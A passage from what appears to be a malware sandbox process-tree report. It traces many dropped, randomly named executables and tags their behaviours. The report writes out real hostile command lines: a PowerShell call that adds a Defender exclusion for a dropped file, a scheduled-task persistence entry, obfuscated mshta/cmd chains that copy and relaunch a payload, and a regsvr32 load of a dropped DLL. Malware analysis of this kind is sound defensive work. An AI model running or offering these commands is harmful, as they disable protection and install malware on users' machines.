      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:936
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:11212
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:16936
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:14476
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:11928
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:15764
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:12664
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:10512
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:13112
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6220
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:13392
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:17912
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:16288
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:8812
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:17420
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:14652
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:17996
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:13856
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:15364
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 15364 -s 28
        7⤵
        Program crash
        
        PID:12024
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:15492
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:19304
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:12016
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:19388
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:12020
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:19120
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:18528
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:19388
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:10576
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:20164
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:19632
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:5528
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:19616
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:14084
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:11300
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:14344
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:3352
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:20308
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:12228
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:10648
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10648 -s 28
        7⤵
        Program crash
        
        PID:19796
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:21228
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:20956
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:9232
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:18388
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:18976
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:15440
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:20904
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:4808
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:18152
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:18352
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:19428
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:19156
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:21512
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:8216
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:22356
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:21548
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:17824
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6200
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:20356
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:15616
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:22636
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:22892
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:23444
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:5612
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:19132
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:14356
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:5880
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:11604
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:24160
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:23820
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:20772
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:5168
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:8704
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:17208
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:9024
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:12576
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:25588
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:23404
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 23404 -s 28
        7⤵
        Program crash
        
        PID:25024
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:17196
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:21740
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:18236
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:23044
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:24868
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:20628
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:20132
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:25936
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:26564
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:26180
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:26276
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:21984
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:26848
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:27432
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:26804
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:16556
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:27348
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:23344
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:27484
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:13168
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:22804
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:6324
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:16120
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:25528
      - C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        
        C:\Users\Admin\Documents\ib8S9xpfy_MPp0J5lz7SFyDD.exe
        6⤵
        
        PID:19668
    - - C:\Users\Admin\Documents\r0HOo1H0DjG_3iBDYXsGJmLf.exe
        
        "C:\Users\Admin\Documents\r0HOo1H0DjG_3iBDYXsGJmLf.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:2952
      - C:\Program Files (x86)\Company\NewProduct\inst001.exe
        
        "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1468
      - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        6⤵
        Executes dropped EXE
        
        PID:4032
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 1964
        7⤵
        Program crash
        
        PID:21676
      - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4520
    - - C:\Users\Admin\Documents\jkrA94j53DO2TxLhf8AaEHDg.exe
        
        "C:\Users\Admin\Documents\jkrA94j53DO2TxLhf8AaEHDg.exe"
        5⤵
        Executes dropped EXE
        
        PID:5460
    - - C:\Users\Admin\Documents\vTxCK9akzifa43q2c5tDpQ7t.exe
        
        "C:\Users\Admin\Documents\vTxCK9akzifa43q2c5tDpQ7t.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5452
      - C:\Users\Admin\AppData\Local\Temp\sv_clip.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sv_clip.exe"
        6⤵
        
        PID:7676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\sv_clip.exe"
        7⤵
        
        PID:8796
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        7⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zuPYnGg" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD257.tmp"
        7⤵
        Creates scheduled task(s)
        
        PID:496
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        7⤵
        
        PID:10620
    - - C:\Users\Admin\Documents\DJOJXgsNy2cGeLdIqFkqoc7U.exe
        
        "C:\Users\Admin\Documents\DJOJXgsNy2cGeLdIqFkqoc7U.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5444
    - - C:\Users\Admin\Documents\4DktHDGzIdFli6YQaqT5IuW7.exe
        
        "C:\Users\Admin\Documents\4DktHDGzIdFli6YQaqT5IuW7.exe"
        5⤵
        
        PID:5436
    - - C:\Users\Admin\Documents\eQmMyLY3cmMmIFtbCdgWpkKW.exe
        
        "C:\Users\Admin\Documents\eQmMyLY3cmMmIFtbCdgWpkKW.exe"
        5⤵
        
        PID:5428
    - - C:\Users\Admin\Documents\q2nY9fszjOSPU307FUeY_FWp.exe
        
        "C:\Users\Admin\Documents\q2nY9fszjOSPU307FUeY_FWp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5420
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\q2nY9fszjOSPU307FUeY_FWp.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\q2nY9fszjOSPU307FUeY_FWp.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )
        6⤵
        
        PID:1520
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\q2nY9fszjOSPU307FUeY_FWp.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\q2nY9fszjOSPU307FUeY_FWp.exe" ) do taskkill /f -im "%~nxA"
        7⤵
        
        PID:5496
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f -im "q2nY9fszjOSPU307FUeY_FWp.exe"
        8⤵
        Kills process with taskkill
        
        PID:872
        
        C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE
        
        X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV
        8⤵
        
        PID:3504
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV ""== """" for %A IN (""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )
        9⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if "-PXPoqL0iOUHHP7hXFattB5ZvsV "== "" for %A IN ("C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"
        10⤵
        
        PID:4344
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj
        9⤵
        Loads dropped DLL
        
        PID:7000
    - - C:\Users\Admin\Documents\XmqgEZLbL0VU13XBdkXuADW9.exe
        
        "C:\Users\Admin\Documents\XmqgEZLbL0VU13XBdkXuADW9.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5404
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 304
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4184
    - - C:\Users\Admin\Documents\LslpgDTQAWjA4LIw1ef3v01V.exe
        
        "C:\Users\Admin\Documents\LslpgDTQAWjA4LIw1ef3v01V.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5396
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 300
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4856
    - - C:\Users\Admin\Documents\mb0_19reA3ek_FaXLGDn1PTP.exe
        
        "C:\Users\Admin\Documents\mb0_19reA3ek_FaXLGDn1PTP.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5388
    - - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
        "C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5380
      - C:\Users\Admin\Documents\rTRyd7x1uj50ESePTCQIZvSL.exe
        
